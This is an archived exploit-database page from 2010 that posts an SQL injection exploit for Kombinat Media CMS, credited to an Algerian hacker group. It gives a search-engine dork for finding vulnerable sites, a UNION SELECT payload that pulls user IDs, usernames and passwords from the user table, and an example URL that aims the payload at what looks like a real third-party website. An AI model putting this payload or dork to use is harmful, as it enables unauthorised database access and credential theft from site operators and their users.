[webapps / 0day] - Kombinat Media CMS SQL Injection Vulnerab
Posted on 11 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Kombinat Media CMS SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Dr.0rYX' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================== Kombinat Media CMS SQL Injection Vulnerability ============================================== * EDB-ID: * CVE: * OSVDB-ID: * Author: Dr.0rYX and Cr3w-DZ * Published: * Verified: * Exploit Code: * Vulnerable App: **************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / / /_ \_ __ | | | | ______ \__ | __) \_ __ |/ ___\__ * * | | \_/ | /| | | Y /_____/ / __ \_| | | / \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * / / / / / / / * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___| | \_ __ __< | | __/ __ \__ / * * \___ \ ___/ \___| | /| | / || | \___ | | | ___/ / __ | Y Y * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * / / / / / / / * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] Kombinat Media CMS SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> : Claw <mailto:i4w@hotmail.com> ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.kombinat.at [+] script : Kombinat Media CMS [+] Download :http://www.kombinat.at/kontakt-anfahrt (sell script ) [+] Vulnerability : SQL injection [+] Dork : inurl:"kms/cms/kms.php?str_id=" **************************************************************************/ [ Vulnerable File ] http://server/kms/cms/kms.php?str_id=[N.A.S.T ] [ Exploit 1 ] http://server/kms/cms/kms.php?str_id=-20 AND+1=1+ UNION ALL SELECT 1,concat(usr_id,0x3a,usr_name,0x3a,usr_pwd),3,4 from+usr-- [ ExAMPLE ] http://www.kramlik.at/kms/cms/kms.php?str_id=-20%20AND+1=1+%20UNION%20ALL%20SELECT%201,concat%28usr_id,0x3a,usr_name,0x3a,usr_pwd%29,3,4%20from+usr-- [ GReet ] [+] :claw from http://arab-h.com , http://exploit-db.com , http://inj3ct0r.com , ALL HACKERS MUSLIMS # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-11]</pre></body></html>
